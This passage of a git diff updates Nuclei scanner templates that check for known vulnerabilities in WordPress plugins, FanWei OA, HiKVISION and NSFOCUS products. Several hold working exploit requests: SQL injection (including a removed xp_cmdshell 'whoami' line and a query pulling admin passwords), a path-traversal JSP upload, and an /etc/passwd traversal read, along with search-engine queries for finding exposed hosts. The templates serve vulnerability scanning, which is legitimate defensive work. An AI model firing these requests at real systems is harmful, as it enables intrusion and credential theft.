$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} + User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 184 + Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 + + --c4155aff43901a8b2a19a4641a5efa15 + Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" + Content-Type: image/jpeg + + {{randstr}} + --c4155aff43901a8b2a19a4641a5efa15-- + + - | + GET /eps/upload/{{name}}.jsp HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: json + name: name + json: + - ".data.resourceUuid" + internal: true matchers: - type: word words: - - "nt authority\\system" + - '{{randstr}}' diff --git a/poc/remote_code_execution/woocommerce-photo-reviews-8eabd8f3601428e7f9c625d55482bc6c.yaml b/poc/remote_code_execution/woocommerce-photo-reviews-8eabd8f3601428e7f9c625d55482bc6c.yaml new file mode 100644 index 0000000000..317cfa265a --- /dev/null +++ b/poc/remote_code_execution/woocommerce-photo-reviews-8eabd8f3601428e7f9c625d55482bc6c.yaml @@ -0,0 +1,59 @@ +id: woocommerce-photo-reviews-8eabd8f3601428e7f9c625d55482bc6c + +info: + name: > + WooCommerce Photo Reviews Premium <= 1.3.13.2 - Authentication Bypass to Account Takeover and Privilege Escalation + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a1e2d370-a716-4d6b-8e23-74db2fbd0760?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woocommerce-photo-reviews/" + google-query: inurl:"/wp-content/plugins/woocommerce-photo-reviews/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woocommerce-photo-reviews,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-photo-reviews/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-photo-reviews" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.13.2') \ No newline at end of file diff --git a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml index 8c93d2bd55..4e7ede529c 100644 --- a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml +++ b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml @@ -1,39 +1,29 @@ id: FanWei + info: - name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability + name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- metadata: - fofa-query: app="泛微-EOffice" - hunter-query: web.title="泛微软件" + fofa-query: app="泛微-协同办公OA" + hunter-query: web.title="泛微-协同办公OA" + http: - raw: - | - POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 + GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) + Accept-Encoding: gzip, deflate Connection: close - Content-Length: 259 - Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 - Accept-Encoding: gzip - - --e64bdf16c554bbc109cecef6451c26a4 - Content-Disposition: form-data; name="Filedata"; filename="test.php" - Content-Type: image/jpeg - - - - --e64bdf16c554bbc109cecef6451c26a4-- req-condition: true matchers: - type: dsl dsl: - - 'status_code_1 == 200 && len(body) > 0' + - 'contains(body_1, "c4ca")' condition: and - -# /attachment/3466744850/xxx.php diff --git a/poc/sql/ecology-sqli2.yaml b/poc/sql/ecology-sqli2.yaml index 37e6ab9baf..eb07a123e2 100644 --- a/poc/sql/ecology-sqli2.yaml +++ b/poc/sql/ecology-sqli2.yaml @@ -10,7 +10,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=exec%20xp_cmd$shell%20%27whoami%27;" + - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=Select%20*%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27" matchers-condition: and matchers: - type: status @@ -18,7 +18,7 @@ requests: - 200 - type: word words: - - "output" - - "mssqlserver" + - "lastname" + - "password" part: body condition: and \ No newline at end of file diff --git a/poc/sql/error-based-sqli.yaml b/poc/sql/error-based-sqli.yaml index ff8438ccbf..b73d67fe17 100644 --- a/poc/sql/error-based-sqli.yaml +++ b/poc/sql/error-based-sqli.yaml @@ -7,7 +7,7 @@ info: description: | Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data, or to override valuable ones, or even to execute dangerous system level commands on the database host. - This is accomplished by the application taking user input and combining it with static parameters to build an SQL query. + This is accomplished by the application taking user input and combining it with static parameters to build an SQL query . tags: sqli,error,dast http: @@ -17,7 +17,6 @@ http: payloads: injection: - - "sleep(5)#" - "sleep(10)#" fuzzing: @@ -25,7 +24,9 @@ http: type: postfix fuzz: - "{{injection}}" - + + stop-at-first-match: true + matchers-condition: and matchers: - type: dsl dsl: diff --git a/poc/sql/html5-video-player-1d6d633d5a9085295638ff332db34930.yaml b/poc/sql/html5-video-player-1d6d633d5a9085295638ff332db34930.yaml new file mode 100644 index 0000000000..2a2cd63adb --- /dev/null +++ b/poc/sql/html5-video-player-1d6d633d5a9085295638ff332db34930.yaml @@ -0,0 +1,59 @@ +id: html5-video-player-1d6d633d5a9085295638ff332db34930 + +info: + name: > + HTML5 Video Player – mp4 Video Player Plugin and Block <= 2.5.34 - Missing Authorization to Authenticated (Subscriber+) Limited Options Update + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6dc3f308-d1e1-430b-bccd-168c0972fe7c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/html5-video-player/" + google-query: inurl:"/wp-content/plugins/html5-video-player/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,html5-video-player,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "html5-video-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.34') \ No newline at end of file diff --git a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml index 8c93d2bd55..4e7ede529c 100644 --- a/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml +++ b/poc/sql_injection/ecology-oa-HrmCareerApplyPerView-sqli.yaml @@ -1,39 +1,29 @@ id: FanWei + info: - name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability + name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability + FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- metadata: - fofa-query: app="泛微-EOffice" - hunter-query: web.title="泛微软件" + fofa-query: app="泛微-协同办公OA" + hunter-query: web.title="泛微-协同办公OA" + http: - raw: - | - POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 + GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) + Accept-Encoding: gzip, deflate Connection: close - Content-Length: 259 - Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 - Accept-Encoding: gzip - - --e64bdf16c554bbc109cecef6451c26a4 - Content-Disposition: form-data; name="Filedata"; filename="test.php" - Content-Type: image/jpeg - - - - --e64bdf16c554bbc109cecef6451c26a4-- req-condition: true matchers: - type: dsl dsl: - - 'status_code_1 == 200 && len(body) > 0' + - 'contains(body_1, "c4ca")' condition: and - -# /attachment/3466744850/xxx.php diff --git a/poc/sql_injection/ecology-sqli2.yaml b/poc/sql_injection/ecology-sqli2.yaml index 37e6ab9baf..eb07a123e2 100644 --- a/poc/sql_injection/ecology-sqli2.yaml +++ b/poc/sql_injection/ecology-sqli2.yaml @@ -10,7 +10,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=exec%20xp_cmd$shell%20%27whoami%27;" + - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=Select%20*%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27" matchers-condition: and matchers: - type: status @@ -18,7 +18,7 @@ requests: - 200 - type: word words: - - "output" - - "mssqlserver" + - "lastname" + - "password" part: body condition: and \ No newline at end of file diff --git a/poc/sql_injection/error-based-sqli.yaml b/poc/sql_injection/error-based-sqli.yaml index ff8438ccbf..b73d67fe17 100644 --- a/poc/sql_injection/error-based-sqli.yaml +++ b/poc/sql_injection/error-based-sqli.yaml @@ -7,7 +7,7 @@ info: description: | Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data, or to override valuable ones, or even to execute dangerous system level commands on the database host. - This is accomplished by the application taking user input and combining it with static parameters to build an SQL query. + This is accomplished by the application taking user input and combining it with static parameters to build an SQL query . tags: sqli,error,dast http: @@ -17,7 +17,6 @@ http: payloads: injection: - - "sleep(5)#" - "sleep(10)#" fuzzing: @@ -25,7 +24,9 @@ http: type: postfix fuzz: - "{{injection}}" - + + stop-at-first-match: true + matchers-condition: and matchers: - type: dsl dsl: diff --git a/poc/ssrf/generic-ssrf.yaml b/poc/ssrf/generic-ssrf.yaml index 6276c76b83..605de026aa 100644 --- a/poc/ssrf/generic-ssrf.yaml +++ b/poc/ssrf/generic-ssrf.yaml @@ -18,4 +18,4 @@ requests: part: interactsh_protocol # Confirms the DNS Interaction words: - "http" - - "dns" + - "dns" \ No newline at end of file diff --git a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml index cd961f6e81..e86e8491d1 100644 --- a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml @@ -1,27 +1,40 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /svm/api/external/report HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' + condition: and diff --git a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml index a8f9cbe173..1cd783867f 100644 --- a/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml +++ b/poc/upload/Nsfocus_NF_Firewall_FileUpload.yaml @@ -1,59 +1,28 @@ id: Green-Alliance info: - name: Green Alliance NF Next Generation Firewall Arbitrary File Upload Vulnerability + name: Green Alliance SAS Fortress GetFile Arbitrary File Read Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: high + severity: medium description: | - Green Alliance SSL VPN has an arbitrary file upload vulnerability, allowing attackers to obtain server privileges and execute remote commands by sending special request packets + There is an arbitrary user login vulnerability in the Green Alliance Fortress machine, which allows attackers to exploit vulnerabilities including www/local_ User. php enables any user to log in metadata: - fofa-query: app="NSFOCUS-下一代防火墙" - hunter-query: web.title="用户认证 - NSFOCUS NF" - + fofa-query: body="'/needUsbkey.php?username='" + hunter-query: web.body="'/needUsbkey.php?username='" http: - - raw: - - | - POST /api/v1/device/bugsInfo HTTP/1.1 - Host: {{Host}}:8081 - Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 238 - Accept-Encoding: gzip, deflate - Connection: close - - --1d52ba2a11ad8a915eddab1a0e85acd9 - Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac72" - - lang|s:52:"../../../../../../../../../../../../../../../../tmp/"; - --1d52ba2a11ad8a915eddab1a0e85acd9-- - - - | - POST /api/v1/device/bugsInfo HTTP/1.1 - Host: {{Host}}:8081 - Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 217 - Accept-Encoding: gzip, deflate - Connection: close - - --4803b59d015026999b45993b1245f0ef - Content-Disposition: form-data; name="file"; filename="compose.php" - - - --4803b59d015026999b45993b1245f0ef-- - - - | - GET /mail/include/header_main.php HTTP/1.1 - Host: {{Host}}:4433 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 - Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac72 + - method: GET + path: + - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd" + matchers-condition: and matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && contains(body_1, 'upload file success')" - - "status_code_2 == 200 && contains(body_2, 'upload file success')" - - "status_code_3 == 200 && contains(body_3, '{{randstr}}')" - condition: and + - type: word + part: body + words: + - "nologin" + + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-debug-log.yaml b/poc/wordpress/wp-debug-log.yaml old mode 100755 new mode 100644 index 2658a93803..8b743b299e --- a/poc/wordpress/wp-debug-log.yaml +++ b/poc/wordpress/wp-debug-log.yaml @@ -1,43 +1,25 @@ id: wp-debug-log info: name: WordPress debug log - author: - - l0ne1y - description: |- - WordPress debug log 调试信息泄漏漏洞 - WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 - WordPress debug log存储了wordpress运行中的调试信息,泄漏后容易被攻击者发现服务器相关信息。 + author: geraldino2,dwisiswant0 severity: low - remediation: |- - 官方修复方案: - 1、建议用户到官方获取最新补丁或者最新版本程序:https://wordpress.com - - 临时修复方案: - 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 - 2、将敏感信息进行加密存储,非必要不可发送前端 - 3、发送敏感信息时需加密传输,如有必要需脱敏处理 - 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 - 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 - 令、会话标识jsessionid等), 防止敏感信息泄漏。 - 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 - 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 - 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 + tags: wordpress,log requests: -- matchers: - - type: word - condition: or - part: header - words: - - octet-stream - - text/plain - - type: regex - part: body - regex: - - '[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP' - - type: status - status: - - 200 - matchers-condition: and - path: - - '{{BaseURL}}/wp-content/debug.log' - method: GET + - method: GET + path: + - "{{BaseURL}}/wp-content/debug.log" + matchers-condition: and + matchers: + - type: word + words: + - octet-stream + - text/plain + part: header + condition: or + - type: regex + regex: + - "[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP" + part: body + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-responsive-video-gallery-with-lightbox-fc78c591ca38d0ab42ea5c6753b32375.yaml b/poc/wordpress/wp-responsive-video-gallery-with-lightbox-fc78c591ca38d0ab42ea5c6753b32375.yaml new file mode 100644 index 0000000000..ca2e57a547 --- /dev/null +++ b/poc/wordpress/wp-responsive-video-gallery-with-lightbox-fc78c591ca38d0ab42ea5c6753b32375.yaml @@ -0,0 +1,59 @@ +id: wp-responsive-video-gallery-with-lightbox-fc78c591ca38d0ab42ea5c6753b32375 + +info: + name: > + video carousel slider with lightbox <= 1.0.6 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/85e70be3-3ed7-4ce1-a20c-046fb7c4ec31?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-responsive-video-gallery-with-lightbox/" + google-query: inurl:"/wp-content/plugins/wp-responsive-video-gallery-with-lightbox/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-responsive-video-gallery-with-lightbox,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-responsive-video-gallery-with-lightbox/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-responsive-video-gallery-with-lightbox" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.6') \ No newline at end of file